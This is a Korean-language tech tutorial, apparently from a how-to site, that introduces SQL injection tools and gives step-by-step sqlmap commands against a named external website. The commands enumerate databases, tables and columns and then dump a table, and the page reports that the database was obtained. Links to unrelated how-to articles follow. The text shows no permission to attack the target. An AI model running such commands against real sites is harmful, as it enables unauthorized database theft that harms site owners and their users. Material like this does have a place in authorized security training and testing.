Web6: SQL 주입 - 일부 악용 도구

Web6: SQL 주입 - 일부 악용 도구

이 섹션에서는 LuckyTemplates가 SQL 주입을 활용하는 데 사용되는 몇 가지 도구를 소개합니다 .

현재 많은 보안 취약점 검색 도구(SQL 삽입 포함)가 있습니다. 이러한 도구를 사용하면 SQL 주입 취약점을 매우 강력하게 감지하고 악용할 수 있습니다. 일반적으로 사용되는 자동 SQL 주입 취약점 악용 도구는 다음과 같습니다.

  • SQLmap
  • The Mole (데이터 발굴)
  • 하비즈

Netsparker, jSQL 주입, Burp, BBQSQL 등 참조할 수 있는 다른 도구도 있습니다.

다음은 Sqlmap을 사용하여 기본 SQL 주입을 활용하는 데모입니다.

http://sqlmap.org/에서 Sqlmap을 다운로드합니다.

Sqlmap은 Python으로 작성되었으므로 이 도구를 사용하려면 Python을 설치해야 합니다. http://www.python.org/downloads/에서 Python을 다운로드할 수 있습니다.

먼저 대상 웹사이트를 식별해야 합니다. 여기에는 다음 대상이 있습니다: http://zerocoolhf.altervista.org/level1.php?id=1 (이 페이지는 이제 종료되었습니다).

1단계 : cmd를 열고 다음 명령을 입력합니다.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”

Web6: SQL 주입 - 일부 악용 도구

sqlmap은 대상의 취약점을 감지하고 취약점에 대한 정보를 제공합니다.

2단계 : 대상 웹사이트에 SQL 주입 취약점이 있다고 판단되면 데이터베이스 이름을 찾습니다.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs

Web6: SQL 주입 - 일부 악용 도구

=> 데이터베이스: my_zerocoolhf

3단계 : 데이터베이스 이름을 결정한 후에는 계속해서 데이터베이스에서 테이블 이름을 찾습니다.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf

Web6: SQL 주입 - 일부 악용 도구

=> 데이터베이스에는 auth와 book이라는 2개의 테이블이 있습니다.

4단계 : 테이블의 열 이름 결정

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book

Web6: SQL 주입 - 일부 악용 도구

=> 도서 테이블의 열(저자, ID, 가격, 제목)을 식별합니다.

5단계 : 테이블에서 데이터를 덤프합니다.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book

Web6: SQL 주입 - 일부 악용 도구

=> 그래서 우리는 대상 웹사이트의 데이터베이스를 얻었습니다.

위는 SQL 주입 오류를 활용하기 위해 sqlmap을 사용하는 기본 데모입니다. https://github.com/sqlmapproject/sqlmap/wiki/Usage에서 sqlmap 옵션에 대해 자세히 알아보고 활용을 지원할 수 있습니다. SQL 주입 공격.


Chromebook을 별도의 화면이나 TV에 연결하는 방법

Chromebook을 별도의 화면이나 TV에 연결하는 방법

Chrome OS는 사용자가 Chromebook을 별도의 화면이나 TV에 연결할 수 있는 다양한 방법을 지원합니다.

ITop Data Recovery를 사용하여 컴퓨터 데이터를 복원하는 방법

ITop Data Recovery를 사용하여 컴퓨터 데이터를 복원하는 방법

iTop Data Recovery는 Windows 컴퓨터에서 삭제된 데이터를 복구하는 데 도움이 되는 소프트웨어입니다. 이 가이드에서는 iTop Data Recovery 사용 방법에 대해 자세히 설명합니다.

Cleaner One Pro로 Mac, Windows PC 속도를 높이는 방법

Cleaner One Pro로 Mac, Windows PC 속도를 높이는 방법

느린 PC와 Mac의 속도를 높이고 유지 관리하는 방법과 Cleaner One Pro와 같은 유용한 도구를 알아보세요.

MSIX란 무엇인가요? Windows의 새로운 파일 형식에 대해 알아보기

MSIX란 무엇인가요? Windows의 새로운 파일 형식에 대해 알아보기

MSIX는 LOB 애플리케이션부터 Microsoft Store, Store for Business 또는 기타 방법을 통해 배포되는 애플리케이션까지 지원하는 크로스 플랫폼 설치 관리자입니다.

키보드 없이 Windows 컴퓨터 화면에 로그인하는 방법

키보드 없이 Windows 컴퓨터 화면에 로그인하는 방법

컴퓨터 키보드가 작동을 멈춘 경우, 마우스나 터치 스크린을 사용하여 Windows에 로그인하는 방법을 알아보세요.

AMD Ryzen Master로 RAM을 쉽게 오버클럭하는 방법

AMD Ryzen Master로 RAM을 쉽게 오버클럭하는 방법

다행히 AMD Ryzen 프로세서를 실행하는 Windows 컴퓨터 사용자는 Ryzen Master를 사용하여 BIOS를 건드리지 않고도 RAM을 쉽게 오버클럭할 수 있습니다.

MS Edge를 실행하고 명령줄에서 URL을 여는 방법

MS Edge를 실행하고 명령줄에서 URL을 여는 방법

Microsoft Edge 브라우저는 명령 프롬프트와 같은 명령줄 도구에서 열 수 있도록 지원합니다. 명령줄에서 Edge 브라우저를 실행하는 방법과 URL을 여는 명령을 알아보세요.

컴퓨터에서 가상 드라이브를 생성하는 최고의 소프트웨어

컴퓨터에서 가상 드라이브를 생성하는 최고의 소프트웨어

이것은 컴퓨터에 가상 드라이브를 생성하는 많은 소프트웨어 중 5개입니다. 가상 드라이브 생성 소프트웨어를 통해 효율적으로 파일을 관리해 보세요.

이제 Windows Store에서 Surface 노트북 하드웨어 테스트 도구를 사용할 수 있습니다.

이제 Windows Store에서 Surface 노트북 하드웨어 테스트 도구를 사용할 수 있습니다.

Microsoft의 공식 Surface 하드웨어 테스트 도구인 Surface Diagnostic Toolkit을 Windows Store에서 다운로드하여 배터리 문제 해결 등의 필수 정보를 찾으세요.

USB에 숨겨진 파일과 폴더를 표시하는 방법

USB에 숨겨진 파일과 폴더를 표시하는 방법

바이러스가 USB 드라이브를 공격하면 USB 드라이브의 모든 데이터를 "먹거나" 숨길 수 있습니다. USB 드라이브의 숨겨진 파일과 폴더를 표시하는 방법은 LuckyTemplates의 아래 기사를 참조하세요.